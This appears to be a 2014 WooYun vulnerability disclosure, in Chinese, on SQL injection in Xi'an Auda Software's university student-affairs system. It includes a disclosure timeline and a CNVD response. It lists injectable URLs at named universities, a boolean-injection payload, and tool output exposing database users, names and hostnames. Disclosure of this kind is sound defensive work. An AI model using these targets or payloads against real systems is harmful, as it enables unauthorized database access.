漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-04-21: 细节已通知厂商并且等待厂商处理中
2014-04-26: 厂商已经确认,细节仅向厂商公开
2014-04-29: 细节向第三方安全合作伙伴开放
2014-06-20: 细节向核心白帽子及相关领域专家公开
2014-06-30: 细节向普通白帽子公开
2014-07-10: 细节向实习白帽子公开
2014-07-23: 细节向公众公开
简要描述:
详细说明:
之前有大牛已经呵呵过他了。 WooYun: 某高校管理系统存在通用型SQL注入漏洞
厂商:西安奥达软件工程有限公司
发现了几个地方有注入的。
SQL1
http://xg.snnu.edu.cn/login/Detail.aspx?Id=3721
Target: http://xg.snnu.edu.cn/login/Detail.aspx?Id=3721
Host IP: 202.117.144.50
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
DB Server: MsSQL no error
Resp. Time(avg): 144 ms
Current User: auda
Current DB: Studwork6
System User: auda
Host Name: SNNU-VM1-03L
Server Name: SNNU-VM1-03L
master
tempdb
model
msdb
pubs
Northwind
Studwork6
http://xg.chd.edu.cn/Login/Detail.aspx?Id=3721
Target: http://xg.chd.edu.cn/Login/Detail.aspx?Id=3721
Host IP: 202.117.64.86
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
DB Server: MsSQL no error
Resp. Time(avg): 155 ms
Current User: audasoft
Current DB: StudWork
System User: audasoft
Host Name: XGB
Server Name: XGB
master
tempdb
model
msdb
pubs
Northwind
StudWork
http://202.117.112.29/login/detail.aspx?Id=30
同。
漏洞证明:
SQL2
http://xg.snnu.edu.cn/Notice/DownLoadLink/DownLoad.aspx?Id=101
另外附送一个,好像就看见这个系统有这个页面:
http://202.117.112.29/login/appointmentdetail.aspx?ID=170%20and%201=1
修复方案:
过滤之类的。
版权声明:转载请注明来源 wefgod@乌云
>
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2014-04-26 10:42
厂商回复:
CNVD确认所述多个实例通用情况,根据3月27日的处置惯例,已经直接将相关信息转报给教育网应急组织(赛尔网络公司),并同时抄报CCERT和上海交通大学网络信息中心。
最新状态:
暂无